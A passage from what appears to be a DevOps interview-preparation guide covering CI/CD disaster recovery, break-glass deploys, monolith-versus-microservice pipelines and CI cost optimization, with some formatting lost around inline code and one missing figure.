- Artifact registry: ECR outage, Artifactory disk full.
- Secret manager: Vault sealed, AWS Secrets Manager throttled.
- Git hosting: GitHub/GitLab unavailable.
- Multi-platform readiness: Have a backup CI system. If GitHub Actions is down, can you trigger a Jenkins pipeline? Many teams don’t need a full backup, but having a documented manual deploy process (the commands you’d run if CI didn’t exist) is essential.
- Artifact registry redundancy: Mirror critical images across regions or registries. If ECR in us-east-1 is down, pull from us-west-2. Use Kubernetes
imagePullPolicy: IfNotPresentso existing pods keep running. - Break-glass procedures: A documented, tested process for deploying without the normal CI/CD pipeline. “In an emergency, an SRE can run
kubectl set image deployment/myapp myapp=ecr.aws/myapp:sha123directly.” This bypasses CI but should require two-person approval and be logged. - GitOps resilience: ArgoCD running in the cluster continues to reconcile even if the Git platform is temporarily unavailable (it caches the last known state). But new deployments are blocked until Git is back.
-
“How do you backup Jenkins configuration?”
Jenkins Configuration as Code (JCasC) plugin stores Jenkins config in YAML files in Git. Job definitions are in Jenkinsfiles (already in Git). Plugin list and versions stored in a
plugins.txtfile. To restore: spin up a new Jenkins instance, apply JCasC, install plugins, point to the Git repos. Recovery time: 30 minutes. Without JCasC, you need filesystem backups of$JENKINS_HOME, which is harder to restore and test. -
“Your artifact registry is down and a critical hotfix needs to go out. What do you do?”
Check if the image is cached on Kubernetes nodes (
imagePullPolicy: IfNotPresentwould use the cached version). Build the image locally and push to a backup registry (Docker Hub, a different region’s ECR). Update the deployment to pull from the backup registry. Or, if the hotfix is a config change (not a code change), use ConfigMap/environment variable updates that don’t require a new image pull. After recovery, re-push to the primary registry and restore the normal pull path. - “How do you ensure the break-glass procedure doesn’t become a bypass for normal CI/CD?” Log every break-glass usage. Require multi-person approval (two SREs must sign off). Auto-create a post-incident ticket for every break-glass deploy. Review break-glass usage in monthly operations reviews. If break-glass is used more than once a quarter for non-DR reasons, the CI/CD system has a reliability problem to fix. Rate-limit break-glass access (auto-expire elevated permissions after 4 hours).
57. CI/CD for Monoliths vs Microservices
57. CI/CD for Monoliths vs Microservices
- Single pipeline: One repo, one build, one artifact, one deploy. Simple and fast.
- Testing: Full test suite runs on every change. As the monolith grows, this gets slow (30+ minutes for large monoliths).
- Deployment: Deploy the entire application for every change, even a one-line fix. A bug in the payment module blocks a deploy of a login fix.
- Scaling challenge: As the team grows, merge conflicts increase. PR queue grows. Pipeline becomes a bottleneck. Google’s monorepo approach mitigates this with affected-only testing, but most teams don’t have Google’s tooling.
- Rollback: All-or-nothing. Rolling back one feature rolls back everything.
- Pipeline per service: Each service has its own pipeline, independent build, test, and deploy. A change to the payment service doesn’t trigger the user service pipeline.
- Testing: Unit and integration tests per service (fast). Cross-service testing via contract tests (not E2E across all services). Testing the full system requires a “staging environment” where all services are deployed.
- Deployment: Deploy services independently. The payment team can deploy 5 times a day without affecting the user team.
- Scaling challenge: 50 services = 50 pipelines to maintain. Shared CI configuration drifts. Environment management is complex (which versions of which services are running in staging?). “It works on my service but breaks when Service B is at version X.”
- Rollback: Independent per service. Rolling back the payment service doesn’t affect other services (if API contracts are maintained).
| Aspect | Monolith | Microservices |
|---|---|---|
| Pipeline count | 1 | N (one per service) |
| Deploy independence | None | Full |
| Testing strategy | Full regression | Per-service + contracts |
| Environment complexity | Low | High (N x M versions) |
| Pipeline maintenance | Centralized | Distributed (shared templates) |
-
“How do you manage CI/CD configuration across 50 microservice repos?”
Shared pipeline templates. GitHub Actions reusable workflows in a central
ci-templatesrepo. Each service’s workflow is 5-10 lines that call the shared template with service-specific parameters (language, Docker context, deployment target). The platform team owns and versions the templates. Services pin to a template version and upgrade on their schedule. This prevents 50 copies of the same pipeline drifting apart. - “How do you test cross-service interactions in a microservice CI/CD?” Contract tests (Pact) in each service’s pipeline verify API compatibility. A shared “integration environment” where all services are deployed runs nightly E2E tests covering critical user journeys. For PR-level testing, use service virtualization (WireMock, Hoverfly) to mock dependent services based on their published contracts. The key insight: you should NOT deploy all 50 services to test one service’s PR.
- “You’re splitting a monolith into microservices. How do you evolve the CI/CD?” Strangler Fig pattern applied to CI/CD. Extract one service at a time. The monolith keeps its pipeline. The extracted service gets its own pipeline and repo (or monorepo project). The monolith’s pipeline adds an integration test that verifies the extracted service’s API. Over time, functionality moves from the monolith pipeline to individual service pipelines. Don’t try to refactor CI/CD all at once — it mirrors the architectural migration.
58. Cost Optimization in CI/CD
58. Cost Optimization in CI/CD
- Compute time: Minutes spent running builds, tests, and scans. At 2,400/month.
- Artifact storage: Docker images, build artifacts, test reports. An unoptimized Docker image is 1-2GB. 100 images/day x 30 days = 3TB = significant storage costs.
- Runner infrastructure: Self-hosted runners: EC2 instances, Kubernetes nodes. Over-provisioned runners (running 24/7 but idle 60% of the time) waste money.
- Egress and transfers: Pulling Docker images across regions, downloading dependencies from the internet.
- Caching: As discussed — reduces dependency download and rebuild time by 30-60%.
- Spot instances: Use AWS Spot or GCP Preemptible VMs for CI runners. 60-80% cheaper. Builds are stateless and retryable, making them perfect for spot instances.
- Right-sizing: Don’t use
c5.4xlargefor a linting job that uses 0.5 CPU. Match runner size to job requirements. Use GitHub Actionsruns-onlabels to route jobs to appropriately-sized runners. - Artifact lifecycle: Delete old artifacts. ECR lifecycle policies: “Delete untagged images after 7 days, keep only 10 most recent tagged images.” Compress build caches.
- Pipeline optimization: Faster pipelines = fewer compute minutes. Parallelism, caching, affected-only testing, skipping unnecessary stages.
- Off-peak scheduling: Run non-urgent pipelines (nightly security scans, performance tests) during off-peak hours when compute is cheaper or has less contention.
- Docker image optimization: Multi-stage builds. Alpine-based images.
.dockerignoreto exclude unnecessary files. Smaller images = faster pull = less egress.
- “How do you track CI/CD costs and attribute them to teams?” Tag CI resources with team identifiers. AWS Cost Explorer with tags for self-hosted runners. GitHub Actions billing dashboard shows usage per workflow. Build a cost dashboard: cost per pipeline run, cost per team, cost trend over time. Create internal “CI budgets” per team with alerts when approaching limits. This creates awareness and incentivizes optimization.
-
“Your Docker images are 2GB each. How do you reduce them?”
Multi-stage builds: build in a full image, copy only the binary to a minimal image. Use Alpine or distroless base images (5-50MB vs 200-500MB). Don’t include dev dependencies, documentation, or test files in production images. Use
.dockerignoreto exclude.git,node_modules, test directories. For Node.js:npm ci --productionor separate build and runtime stages. For Go: single binary copied toscratchimage (literally empty filesystem). Target: 50-200MB for application images. - “Self-hosted runners cost $10K/month but are idle 70% of the time. What do you do?” Implement auto-scaling. Kubernetes-based runners (ARC for GitHub Actions) scale pods up when jobs are queued and down to zero when idle. For EC2-based runners, use an ASG that scales based on the pending job queue (via a Lambda webhook). Set minimum capacity to 0 during nights/weekends if the team doesn’t deploy off-hours. Use spot instances for the auto-scaled pool (on-demand for minimum capacity). Target: < 30% idle time across the runner fleet.